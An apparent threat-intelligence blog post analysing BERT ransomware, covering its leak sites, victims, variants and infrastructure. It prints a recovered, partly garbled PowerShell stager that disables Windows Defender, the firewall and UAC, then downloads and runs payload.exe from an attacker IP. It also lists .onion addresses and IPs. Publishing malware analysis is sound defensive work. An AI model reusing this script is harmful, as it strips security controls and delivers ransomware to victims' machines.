NOTE: This is an Initial Investigation Report on Bert Ransomware as I have spotted multiple infections within a short time-span
BERT Ransomware was actually spotted in April 2025, but they have marked their presence since mid-March 2025 upon analyzing a few of the samples.
It is believed that they target their victims via Phishing.
The group initially targeted Windows Environment in March 2025, but in May 2025; the group had upgraded to launch attacks targeting Linux Machines as well.
They can be reached on the Dark Web at:-
bertblogsoqmm4ow7nqyh5ik7etsmefdbf25stauecytvwy7tkgizhad.onion
The group stores their victim leaks on another server; which can be reached at:-
wtwdv3ss4d637dka7iafl7737ucykei7pluzc7is3mgo2vl5nmq7eeid.onion
All the leaks are shared on partly basis using the naming as “part1”, “part2”, “part3” etc as zipped archives.
On all victim page, the legitimate URL of the victim along with their Revenue and Published Date is being mentioned.
The site gives a “Contact us” for the netizens to get in contact directly with the group.
It is notable that both these servers (Data Leaks and File Storage) are running under Apache/2.4.52 (Ubuntu).
NEGOTIATION
Unlike other ransomware groups, this group does not have a dedicated Onion Domain to carry out the negotiation (till now). Hence, their mode of communication is in privacy-focused Sessions.
The group demands their ransom in BTC. Here is the chat initiated for a victim whose demand is 1.5 BTC.
VICTIMOLOGY
Like other ransomware groups, the US tops the list with count #2. Other affected geographies are the UK, Malaysia, Taiwan, Columbia, and Turkey.
Regarding the sectors; the most affected are Service and Manufacturing Sectors. Other sectors involved are: Logistics, IT, and Healthcare.
SAMPLE ANALYSIS
Here, you won’t see the complete analysis report. (Hence sharing the samples so Researchers and go and analyze the same).
I managed to collect 8 samples of BERT and uploaded them to the community portal for better reversing for other passionate security nerds.
There were 6 EXE files (for Windows Environment) and 2 ELF (for Linux Environment) found.
Among these, only 1 file had a legitimate timestamp, which was created/coded on 20th May 2025 (MD5: 00fdc504be1788231aa7b7d2d1335893). The rest of the files’ yearly timestamps are manipulated to future years such as 2047, 2076, 2071 or 2063 etc.
From this; we can deduce that this ransomware became active in mid-May 2025.
Most of the files (#5) are file-named “newcryptor.exe” which is unique to this ransomware. Bert and Bert11 are the other 2 filenames found in the sample collection. Other used filenames observed are: worker.exe, payload.exe, build.exe, build.exe.bin, ESXDSC04_bert11.
WINDOWS VARIANT
Upon analyzing a sample; I found that this sample adds a series of extensions such as:
- encryptedbybert
- encryptedbybert3
- encryptedbybert11
- encrypted_bert
- hellofrombert
This is an unfamiliar approach which is not popularly seen in any ransomware family.
The files are encrypted using RSA via WinAPI.
The observed sample is compiled using .NET and the ransom note is found to be file-named “note.txt” unlike other groups like “read-me”.
Here is the Ransom Note of the group:-
Unlike other groups’; their ransom note is short.
The observed path is found to be the same in all the observed samples which is: D:\new folder\Tiger\newcryptor\obj\Release\newcryptor.pdb
LINUX VARIANT
Upon scanning the file, it is found that the Linux Variant has an 80% code-base match with Sodinokibi Ransomware which is also called Revil Ransomware.
AWK command is used to query the registry. The files are encrypted using AES and RC4 PRGA. Salsa20 and ChaCha algorithms are also observed for encryption used by the Linux variant. Data are also encoded using Base64.
WEAPONIZING POWERSHELL SCRIPT
During the Investigation, I came across the Powershell file which is stored on a remote server that is making contact with the Bert Sample upon execution.
The observed path was:-
Before pushing the encrypted payload (which we will discuss); this script weakens the system by disabling/downgrading Security and System Privileges.
This is the PS file obtained:-
([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
Write-Host "
Start-Process PowerShell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File
"$PSCommandPath
"" -Verb RunAs
exit
Write-Host "[*]
Windows Defender..."
Windows Defender
$defenderPaths = @(
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender",
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection",
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Cloud Based Protection"
foreach ($path in $defenderPaths) {
if (-not (Test-Path $path)) { New-Item -Path $path -Force
Out-Null }
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Cloud Based Protection" -Name "DisableCloudProtection" -Value 1 -Type DWord -Force
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender",
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection",
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Cloud Based Protection"
foreach ($path in $defenderPaths) {
if (-not (Test-Path $path)) { New-Item -Path $path -Force
Out-Null }
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1 -Type DWord -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Cloud Based Protection" -Name "DisableCloudProtection" -Value 1 -Type DWord -Force
DWord -Force
Defender
Get-Service -Name "WinDefend", "Sense" -ErrorAction SilentlyContinue
Stop-Service -Force
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False -ErrorAction SilentlyContinue
UAC..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0 -Type DWord -Force
payload.exe
$downloadUrl = "http://185.100.157.74/payload.exe"
$destPath = "$env:TEMP\payload.exe"
$downloadUrl..."
Invoke-WebRequest -Uri $downloadUrl -OutFile $destPath -ErrorAction Stop
} catch {
Write-Error "[
if (-not (Test-Path $destPath)) {
payload.exe..."
Start-Process -FilePath $destPath -Verb RunAs -Wait
Write-Host "[+]
Here’s a breakdown of its functionality:
Key Actions in the Script
- Privilege Escalation Check:
It first checks if the script is running with administrative privileges using Security.Principal.WindowsPrincipal. If not, it attempts to re-run itself with elevated permissions.
2. Windows Defender Disabling:
- The script modifies several registry entries to disable Windows Defender’s AntiSpyware, Real-Time Protection, and Cloud-Based Protection.
- It also attempts to stop security-related services (
WinDefend,Sense) and disables Windows Firewall across all profiles.
3. User Account Control (UAC) Modification:
The script sets "EnableLUA" to 0, which effectively disables UAC, lowering security protections and allowing malicious operations to proceed unchecked.
4. Downloading and Executing a Payload:
- It fetches an executable (
payload.exe) from an external IP (185.100.157.74), which is highly indicative of malware delivery. - It downloads the file to the system’s temp directory and then executes it with administrative privileges.
In a nutshell:-
- Registry Modifications disabling security features
- Disabling Defender, Firewall & UAC to bypass security controls
- External Payload Download from an unknown IP
- Execution of malicious binaries
This aligns with common ransomware behavior, where the malware weakens security defenses before executing its encryption payload.
FINDING PAYLOAD
Upon analyzing the network communication of the above-discussed Powershell file, we found the payload used by BERT to download into the infected system:-
It is notable that both these files (Powershell and Payload) are stored in the same server, mapped to Sweden 🇸🇪.
While tracing the IP’s real registrant; it is found that the IP is being under the control of a Russian Firm:-
UNITEDNET’s legal name is Edinaya Set Limited; which is a popular provider in Russia 🇷🇺.
No wonder, the threat actors again chose a Russian Infrastructure to blend in the bad traffic!
MITRE ATTACK FRAMEWORK
Here is the MITRE Metrics for Windows Executable:-
Here is the MITRE Metrics for Linux Executable:-
TOR DLS EXPOSURE
While doing a fingerprint scan, it is found that the Group had hosted their TOR DLS (Data Leak Site) to a Russian Server.
82.115.223.89:3030
NOTE: Though it maps the IP to Geo-Location Netherlands presently, it was the part of Russian Network.
From the above; we can see that the group had used React Framework : NextJS to on their DLS.
The ASN is AS202973 which had seen previously hosting Mystic Stealer.
CONCLUSION
From the collected samples, it is found that the group had made an effort to self-code the Ransomware for Windows Executable, however for Linux Files; they have relied on the old Revil Ransomware for the spin-off.
IOCs
For IOCs of Bert, you may visit my Github Profile here!
NOTE: The article is purely an Individual Research that belongs to THE RAVEN FILE and is not subject to be used/published anywhere without the Author’s consent.
Follow me on X/Twitter for interesting DarkWeb/InfoSec Short findings! 😉
Leave a Reply